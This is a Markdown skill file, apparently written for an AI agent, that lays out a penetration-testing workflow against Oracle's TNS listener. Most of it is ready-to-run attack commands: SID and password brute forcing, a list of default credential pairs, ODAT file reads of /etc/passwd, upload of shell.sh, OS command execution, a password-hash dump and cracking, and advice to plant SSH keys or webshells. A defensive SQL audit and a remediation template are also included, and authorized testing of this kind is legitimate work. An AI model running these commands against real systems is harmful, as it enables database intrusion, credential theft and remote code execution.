---
name: pentesting-oracle
description: Testing Oracle Database via the TNS Listener (default port 1521, plus secondary listeners 1522-1529) for SID disclosure/bruteforce, default and weak account credentials, TNS listener misconfiguration and poisoning, and ODAT-driven file read/write and OS command-execution primitives during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  - penetration-testing
  - network-services
  - database
  - oracle
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Pentesting Oracle TNS Listener (port 1521)

## When to Use

- Default 1521/tcp (TNS Listener); secondary listeners commonly on 1522-1529, legacy on 1748.
- Banner like `Oracle TNS Listener 9.2.0.1.0`; the listener is the entry point — you must learn a SID/service name before authenticating.
- Use when nmap shows `oracle-tns`, when you have recovered DB account creds, or to abuse the listener (older versions allow remote control / poisoning).
## Quick Enumeration

```bash
# Version
nmap --script oracle-tns-version -p1521 -sV <IP>
nmap --script "oracle-sid-brute" -p1521 <IP>   # discover SIDs
# All-in-one with ODAT (the primary Oracle pentest tool)
./odat-libc2.12-x86_64 all -s <IP> -p 1521
# SID + credential brute via ODAT
./odat sidguesser -s <IP> -p 1521
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt
msfconsole -q -x 'use auxiliary/scanner/oracle/sid_enum; set RHOSTS <IP>; run; exit'
```
## Critical: Checks Most Often Missed

- **SID/service name disclosure** — without a SID you cannot log in; older listeners disclose it, otherwise brute force it.
  - How to CONFIRM: `nmap --script oracle-sid-brute -p1521 <IP>` or `./odat sidguesser -s <IP>` returns a SID (e.g. `XE`, `ORCL`, `PLSExtProc`).
- **Default / weak account credentials** — Oracle ships many well-known accounts: `system:manager`, `sys:change_on_install`, `scott:tiger`, `dbsnmp:dbsnmp`, `outln:outln`, `system:oracle`.
  - How to CONFIRM: `sqlplus system/manager@<IP>:1521/<SID>` connects, or `./odat passwordguesser` reports valid pairs.
- **TNS listener with no password / TNS poison (CVE-2012-1675)** — an unauthenticated listener can be queried/reconfigured; TNS poisoning lets an attacker register a rogue instance and MITM sessions.
  - How to CONFIRM: `tnscmd10g status -h <IP>` returns listener details without a password; check the listener version against CVE-2012-1675.
- **File read/write + OS command execution via ODAT** — with a valid DB account, abuse `UTL_FILE` (read/write files), external tables, `DBMS_SCHEDULER`/Java stored procedures (run OS commands), and `UTL_HTTP`/`UTL_TCP` for SSRF.
  - How to CONFIRM: `./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /etc passwd passwd` retrieves a file (ODAT argument order is `<remote dir> <remote file> <local file>`); `./odat externaltable ... --exec ...` or `./odat dbmsscheduler ... --exec` runs a command.
- **Privilege escalation via PUBLIC/EXECUTE grants** — over-granted packages (`DBMS_*`) let low-priv users escalate to DBA.
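The over-granted-package and default-account conditions in the list above (and the revocation in recommendation 4 of the finding template) can be audited from the DBA side with the queries below. This is an added defensive example, not part of the original cheat sheet or of ODAT; it assumes a DBA-privileged `sqlplus` session and uses the package and account names this page discusses.

```sql
-- Added audit example (not from the page or ODAT): run as a DBA to find the
-- conditions this page's file/RCE primitives depend on, then close them.

-- 1. EXECUTE granted to PUBLIC on the packages the ODAT modules abuse.
--    DBMS_JAVA is the PL/SQL side of the Java stored-procedure path.
SELECT table_name AS package_name, grantee, privilege
  FROM dba_tab_privs
 WHERE grantee   = 'PUBLIC'
   AND privilege = 'EXECUTE'
   AND owner     = 'SYS'
   AND table_name IN ('UTL_FILE', 'DBMS_SCHEDULER', 'UTL_HTTP',
                      'UTL_TCP', 'UTL_INADDR', 'DBMS_JAVA')
 ORDER BY table_name;

-- 2. Well-known accounts that are still OPEN; these are the first pairs
--    passwordguesser tries, so anything OPEN here needs a non-default password.
SELECT username, account_status, profile
  FROM dba_users
 WHERE username IN ('SYSTEM', 'SYS', 'SCOTT', 'DBSNMP', 'OUTLN')
 ORDER BY username;

-- 3. Oracle's own list of accounts still on their shipped default password
--    (view exists in 11g and later).
SELECT username FROM dba_users_with_defpwd ORDER BY username;

-- 4. Broad system privileges the page names as DBA escalation paths,
--    held by anything other than the core administrative grantees.
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE')
   AND grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
 ORDER BY grantee, privilege;

-- Remediation matching recommendation 4: drop the PUBLIC grants (application
-- accounts that genuinely need a package get an explicit grant instead) and
-- lock the sample/legacy accounts found OPEN in step 2.
REVOKE EXECUTE ON sys.utl_file       FROM PUBLIC;
REVOKE EXECUTE ON sys.dbms_scheduler FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_http       FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_tcp        FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_inaddr     FROM PUBLIC;
ALTER USER scott ACCOUNT LOCK PASSWORD EXPIRE;
ALTER USER outln ACCOUNT LOCK PASSWORD EXPIRE;
```

Re-run query 1 after the revokes to confirm no PUBLIC EXECUTE rows remain; DBSNMP is deliberately left out of the locks because Enterprise Manager depends on it, so rotate its password instead.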
## Workflow

### Step 1: Enumerate (version, SID, accounts)

```bash
nmap --script oracle-tns-version,oracle-sid-brute -p1521 <IP>
./odat sidguesser -s <IP> -p 1521
# Once a SID is known, fingerprint accessible accounts
./odat passwordguesser -s <IP> -p 1521 -d <SID> --accounts-file accounts.txt
```

### Step 2: Authenticate (default/weak creds, brute force)

```bash
# Native client (instantclient sqlplus)
sqlplus <user>/<pass>@<IP>:1521/<SID>
sqlplus system/manager@<IP>:1521/XE
# As SYSDBA
sqlplus sys/change_on_install@<IP>:1521/XE as sysdba
# Brute force
./odat passwordguesser -s <IP> -d <SID> --accounts-file /usr/share/oscanner/accounts.default
hydra -L users.txt -P passwords.txt <IP> oracle-listener   # or oracle-sid
nxc oracle <IP> --sid <SID> -u users.txt -p passwords.txt
```

### Step 3: Exploit / Extract (data dump + ODAT file/RCE primitive)

```sql
-- Native recon once connected
SELECT * FROM v$version;
SELECT username FROM all_users;
SELECT name, password, spare4 FROM sys.user$;  -- hashes (DBA)
SELECT table_name FROM all_tables;
```

```bash
# Arbitrary file READ / WRITE (UTL_FILE); argument order is <remote dir> <remote file> <local file>
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --getFile /etc passwd passwd
./odat utlfile -s <IP> -d <SID> -U <user> -P <pass> --putFile /tmp shell.sh ./shell.sh
# OS command execution
./odat externaltable -s <IP> -d <SID> -U <user> -P <pass> --exec /tmp run.sh
./odat dbmsscheduler -s <IP> -d <SID> -U <user> -P <pass> --exec "/bin/bash -c 'id'"
./odat java -s <IP> -d <SID> -U <user> -P <pass> --exec "id"
# Run every ODAT module (file read/write and command-exec primitives) in one pass
./odat all -s <IP> -d <SID> -U <user> -P <pass>
```
### Step 4: Post-access / privilege escalation / pivot

- Dump `sys.user$` password hashes (Oracle 10g DES, 11g SHA-1 `spare4`) and crack with Hashcat (modes 3100 / 112).
- Abuse over-granted `DBMS_*` packages or `CREATE ANY PROCEDURE`/`EXECUTE ANY` to reach DBA, then SYSDBA.
- Use `UTL_HTTP`/`UTL_TCP`/`UTL_INADDR` from the DB for SSRF / internal port scanning, and the DB host file-write to land SSH keys or webshells.
- Reuse recovered Oracle creds (often reused for `dbsnmp`, app accounts) against other services.
## Key Concepts

| Concept | Description |
|---|---|
| TNS Listener | Network front-end on 1521 that routes clients to DB instances; must be queried for a SID. |
| SID / Service name | Identifier of a database instance required to authenticate (e.g. XE, ORCL). |
| Default accounts | Well-known creds (system/manager, sys/change_on_install, scott/tiger, dbsnmp/dbsnmp). |
| TNS poisoning (CVE-2012-1675) | Rogue instance registration on an unauthenticated listener enabling session MITM. |
| UTL_FILE | PL/SQL package for reading/writing files on the DB server. |
| External tables / DBMS_SCHEDULER / Java SP | PL/SQL mechanisms ODAT abuses for OS command execution. |
| UTL_HTTP / UTL_TCP | Outbound network packages enabling SSRF and internal scanning. |

## Tools & Systems

| Tool | Purpose |
|---|---|
| ODAT | Oracle Database Attacking Tool — SID guess, password guess, UTL_FILE read/write, external-table/DBMS_SCHEDULER/Java command exec, all chain. |
| sqlplus / instantclient | Native client for authenticated queries and SYSDBA login. |
| nmap NSE | oracle-tns-version, oracle-sid-brute, oracle-brute, oracle-enum-users. |
| Metasploit | scanner/oracle/sid_enum, tnscmd, oracle_login, listener/version modules. |
| netexec (nxc) | `nxc oracle <IP> --sid <SID> -u .. -p ..` for auth/spraying. |
| hydra | Brute force oracle-listener / oracle-sid services. |
| Hashcat / John | Crack dumped sys.user$ hashes (modes 3100 / 112). |

## Common Scenarios

### Scenario 1: SID brute → default creds → data dump

`oracle-sid-brute` reveals SID `XE`. `sqlplus system/manager@<IP>:1521/XE` connects with the default password, and the tester dumps application tables and `sys.user$` hashes.

### Scenario 2: Valid account → OS command execution

With a low-priv DB account, ODAT's external-table module writes a script to disk and executes it (`./odat externaltable ... --exec`), returning command output as the Oracle OS user.

### Scenario 3: Unauthenticated listener → poisoning

An old listener answers `tnscmd10g status` without a password and is vulnerable to CVE-2012-1675, allowing a rogue instance to be registered and client sessions to be intercepted.
## Output Format

```markdown
## Oracle Finding
**Service**: Oracle TNS Listener
**Port**: 1521/tcp (Oracle 11g, SID=XE)
**Severity**: Critical
**Finding**: Default SYSTEM credentials enabling file read and OS command execution
**Evidence**:
- nmap oracle-sid-brute -> SID "XE"
- sqlplus system/manager@<IP>:1521/XE -> connected
- ./odat externaltable -s <IP> -d XE -U system -P manager --exec /tmp id -> uid=54321(oracle)
**Impact**: Full database compromise plus OS command execution as the Oracle service account.
**Recommendation**:
1. Change all default account passwords; lock/expire unused accounts (scott, dbsnmp, outln).
2. Set a listener password and apply patches for CVE-2012-1675 (enable Valid Node Checking).
3. Restrict 1521-1529 by firewall/source IP.
4. Revoke EXECUTE on UTL_FILE / DBMS_SCHEDULER / Java from PUBLIC and least-privilege app accounts.
```